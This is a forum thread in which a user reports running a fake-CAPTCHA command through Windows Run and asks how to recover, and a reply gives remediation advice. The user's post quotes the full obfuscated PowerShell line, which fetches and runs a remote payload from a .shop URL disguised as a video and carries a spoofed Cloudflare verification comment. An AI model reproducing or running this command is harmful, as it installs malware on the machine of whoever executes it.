I accidentally executed
POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''
via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.
What should I do? is full system wipe necessary? or can I remove it somehow?
If I need to do a system format what about attached drives and other devices on the network?
Hackers have been figuring out a variety of nifty ways to trigger powershell commands for nefarious purposes. For whatever it’s worth, I’m glad you spotted it. As the other commenter suggested, I’d recommend a full data backup and
reinstall Windowsinstall Linux. And change your passwords and shit.Also, this video from ThioJoe is very relevant and revealing as to how sneaky these sort of attacks can be…
https://youtube.com/watch?v=0x5qAc85PvQ